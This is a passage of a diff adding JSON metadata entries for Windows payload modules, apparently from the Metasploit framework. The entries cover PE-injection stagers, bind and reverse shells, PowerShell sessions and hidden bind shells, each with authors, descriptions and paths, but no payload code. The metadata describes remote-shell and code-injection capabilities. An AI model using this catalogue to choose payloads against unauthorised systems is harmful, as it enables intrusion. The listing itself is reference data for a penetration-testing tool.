"/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/peinject/bind_nonx_tcp": { + "name": "Windows Inject PE Files, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "vlad902 " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/peinject/bind_tcp": { + "name": "Windows Inject PE Files, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/peinject/bind_tcp_rc4": { + "name": "Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/peinject/bind_tcp_uuid": { + "name": "Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/peinject/find_tag": { + "name": "Windows Inject PE Files, Find Tag Ordinal Stager", + "fullname": "payload/windows/peinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "skape " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/peinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/peinject/reverse_ipv6_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/peinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/peinject/reverse_named_pipe": { + "name": "Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/peinject/reverse_nonx_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "vlad902 " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/peinject/reverse_ord_tcp": { + "name": "Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/peinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "spoonm " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_windows/peinject/reverse_tcp": { + "name": "Windows Inject PE Files, Reverse TCP Stager", + "fullname": "payload/windows/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_windows/peinject/reverse_tcp_allports": { + "name": "Windows Inject PE Files, Reverse All-Port TCP Stager", + "fullname": "payload/windows/peinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_windows/peinject/reverse_tcp_dns": { + "name": "Windows Inject PE Files, Reverse TCP Stager (DNS)", + "fullname": "payload/windows/peinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_windows/peinject/reverse_tcp_rc4": { + "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_windows/peinject/reverse_tcp_rc4_dns": { + "name": "Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/windows/peinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_windows/peinject/reverse_tcp_uuid": { + "name": "Windows Inject PE Files, Reverse TCP Stager with UUID Support", + "fullname": "payload/windows/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/peinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_windows/pingback_bind_tcp": { + "name": "Windows x86 Pingback, Bind TCP Inline", + "fullname": "payload/windows/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Open a socket and report UUID when a connection is received (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/pingback_reverse_tcp": { + "name": "Windows x86 Pingback, Reverse TCP Inline", + "fullname": "payload/windows/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/windows/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/windows/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/windows/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "vlad902 ", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session over SSL", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "windows/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/shell/bind_hidden_ipknock_tcp": { + "name": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/shell/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/shell/bind_hidden_tcp": { + "name": "Windows Command Shell, Hidden Bind TCP Stager", + "fullname": "payload/windows/shell/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/shell/bind_ipv6_tcp": { + "name": "Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/shell/bind_ipv6_tcp_uuid": { + "name": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/shell/bind_named_pipe": { + "name": "Windows Command Shell, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "UserExistsError" + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/shell/bind_nonx_tcp": { + "name": "Windows Command Shell, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "vlad902 " + ], + "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/shell", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/shell/bind_tcp": { + "name": "Windows Command Shell, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "spoonm ", + "sf ", + "hdm ", + "skape " + ], + "description": 